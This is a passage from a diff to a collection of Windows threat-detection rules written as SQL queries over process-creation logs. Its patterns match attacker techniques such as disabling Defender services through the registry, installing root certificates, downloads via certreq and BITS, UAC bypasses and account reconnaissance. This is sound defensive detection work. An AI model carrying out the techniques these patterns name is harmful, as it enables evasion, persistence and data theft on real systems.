Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_lazarus_group_activity.yml" + "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" }, { - "title": "Reg Disable Security Service", - "id": "5e95028c-5229-4214-afae-d653d573d0ec", - "status": "experimental", - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", + "title": "New Root Certificate Installed Via Certutil.EXE", + "id": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", + "status": "test", + "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1553.004" ], "falsepositives": [ - "Unknown", - "Other security solution installers" + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%/addstore%' ESCAPE '\\' OR CommandLine LIKE '%-addstore%' ESCAPE '\\') AND CommandLine LIKE '%root%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_disable_sec_services.yml" + "filename": "proc_creation_win_certutil_certificate_installation.yml" }, { - "title": "WmiPrvSE Spawned PowerShell", - "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "status": "stable", - "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a signe of remote access via WMI", - "author": "Markus Neis @Karneades", + "title": "Suspicious Use of CSharp Interactive Console", + "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", + "status": "test", + "description": "Detects the execution of CSharp interactive console by PowerShell", + "author": "Michael R. (@nahamike01)", "tags": [ "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.t1127" ], "falsepositives": [ - "AppvClient", - "CCM" + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll'))) AND NOT ((CommandLine = 'null') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" ], - "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" + "filename": "proc_creation_win_csi_use_of_csharp_console.yml" }, { - "title": "Suspicious Process Parents", - "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "title": "Conhost Parent Process Executions", + "id": "7dc2dedd-7603-461a-bc13-15803d132355", "status": "experimental", - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (NewProcessName = '')))))" - ], - "filename": "proc_creation_win_susp_parents.yml" - }, - { - "title": "New User Created Via Net.EXE", - "id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", - "status": "test", - "description": "Identifies the creation of local users via the net.exe command.", - "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", + "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", + "author": "omkar72", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate user creation.", - "Better use event IDs for user creation rather than command line rules." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND NOT ((Provider_Name = 'SystemTraceProvider-Process') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND NewProcessName LIKE '%\\\\git.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% show --textconv %' ESCAPE '\\' OR ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (ParentCommandLine LIKE '%C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4%' ESCAPE '\\' AND (CommandLine LIKE '% show --textconv %' ESCAPE '\\' OR CommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND (ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\' OR ParentCommandLine LIKE '%show --textconv%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1''' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4''' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_user_add.yml" + "filename": "proc_creation_win_conhost_susp_child_process.yml" }, { - "title": "Use of W32tm as Timer", - "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "title": "UAC Bypass via Windows Firewall Snap-In Hijack", + "id": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", "status": "experimental", - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "author": "frack113", + "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", + "author": "Tim Rauch", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%WF.msc%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_w32tm.yml" + "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" }, { - "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "title": "Suspicious Certreq Command to Download", + "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", "status": "experimental", - "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" }, { - "title": "Capture Credentials with Rpcping.exe", - "id": "93671f99-04eb-4ab4-a161-70d446a84003", - "status": "test", - "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", - "author": "Julia Fomina, oscd.community", + "title": "Sysinternals PsService Execution", + "id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", + "status": "experimental", + "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Unlikely" + "Legitimate use of PsService by an administrator" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rpcping.exe' ESCAPE '\\' AND (CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/s%' ESCAPE '\\')) AND ((CommandLine LIKE '%-u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%/u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%-t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\') OR (CommandLine LIKE '%/t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'psservice.exe' OR (NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rpcping_credential_capture.yml" + "filename": "proc_creation_win_sysinternals_psservice.yml" }, { - "title": "MMC Spawning Windows Shell", - "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", - "status": "test", - "description": "Detects a Windows command line executable started from MMC", - "author": "Karneades, Swisscom CSIRT", + "title": "Windows Binary Executed From WSL", + "id": "ed825c86-c009-4014-b413-b76003e33d35", + "status": "experimental", + "description": "Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.003" + "attack.execution", + "attack.defense_evasion", + "attack.t1202" ], - "level": "high", + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName REGEXP '[a-zA-Z]:\\\\' AND CurrentDirectory LIKE '%\\\\\\\\wsl.localhost%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mmc_susp_child_process.yml" + "filename": "proc_creation_win_wsl_windows_binaries_execution.yml" }, { - "title": "Suspicious DumpMinitool Usage", - "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "title": "PUA - DefenderCheck Execution", + "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "status": "experimental", - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1027.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') AND ((NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR (CommandLine LIKE '% Full%' ESCAPE '\\' AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" ], - "filename": "proc_creation_win_dumpminitool_susp_execution.yml" + "filename": "proc_creation_win_pua_defendercheck.yml" }, { - "title": "Suspicious Certreq Command to Download", - "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", - "status": "experimental", - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "author": "Christian Burkard (Nextron Systems)", + "title": "Monitoring For Persistence Via BITS", + "id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", + "status": "test", + "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", + "author": "Sreeman", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1197" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/SetNotifyCmdLine%' ESCAPE '\\' AND (CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\')) OR (CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/Addfile%' ESCAPE '\\' AND (CommandLine LIKE '%http:%' ESCAPE '\\' OR CommandLine LIKE '%https:%' ESCAPE '\\' OR CommandLine LIKE '%ftp:%' ESCAPE '\\' OR CommandLine LIKE '%ftps:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" + "filename": "proc_creation_win_bitsadmin_potential_persistence.yml" }, { - "title": "Taskmgr as Parent", - "id": "3d7679bd-0c00-440c-97b0-3f204273e6c7", + "title": "HackTool - SILENTTRINITY Stager Execution", + "id": "03552375-cc2c-4883-bbe4-7958d5a980be", "status": "test", - "description": "Detects the creation of a process from Windows task manager", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects SILENTTRINITY stager use via PE metadata", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\resmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_taskmgr_susp_child_process.yml" + "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" }, { - "title": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", - "id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", + "title": "VMToolsd Suspicious Child Process", + "id": "5687f942-867b-4578-ade7-1e341c46e99a", "status": "experimental", - "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", - "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "author": "behops, Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002" + "attack.execution", + "attack.persistence", + "attack.t1059" ], "falsepositives": [ - "Inventory tool runs", - "Administrative activity" + "Legitimate use by administrator" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((((CommandLine LIKE '% group %' ESCAPE '\\' OR CommandLine LIKE '% localgroup %' ESCAPE '\\') AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\' OR CommandLine LIKE '% /do%' ESCAPE '\\')) AND NOT (CommandLine LIKE '% /add%' ESCAPE '\\')) OR (CommandLine LIKE '% accounts %' ESCAPE '\\' AND CommandLine LIKE '% /do%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_groups_and_accounts_recon.yml" + "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" }, { - "title": "Imports Registry Key From a File", - "id": "73bba97f-a82d-42ce-b315-9182e76c57b1", - "status": "test", - "description": "Detects the import of the specified file to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Directory Removal Via Rmdir", + "id": "41ca393d-538c-408a-ac27-cf1e038be80c", + "status": "experimental", + "description": "Detects execution of the builtin \"rmdir\" command in order to delete directories.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "author": "frack113", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Legitimate import of keys", - "Evernote" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')) AND (CommandLine REGEXP ':[^ \\\\]')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%rmdir%' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%/q%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_import_keys.yml" + "filename": "proc_creation_win_cmd_rmdir_execution.yml" }, { - "title": "File or Folder Permissions Modifications", - "id": "37ae075c-271b-459b-8d7b-55ad5f993dd8", - "status": "test", - "description": "Detects a file or folder's permissions being modified or tampered with.", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "title": "UAC Bypass via ICMLuaUtil", + "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass 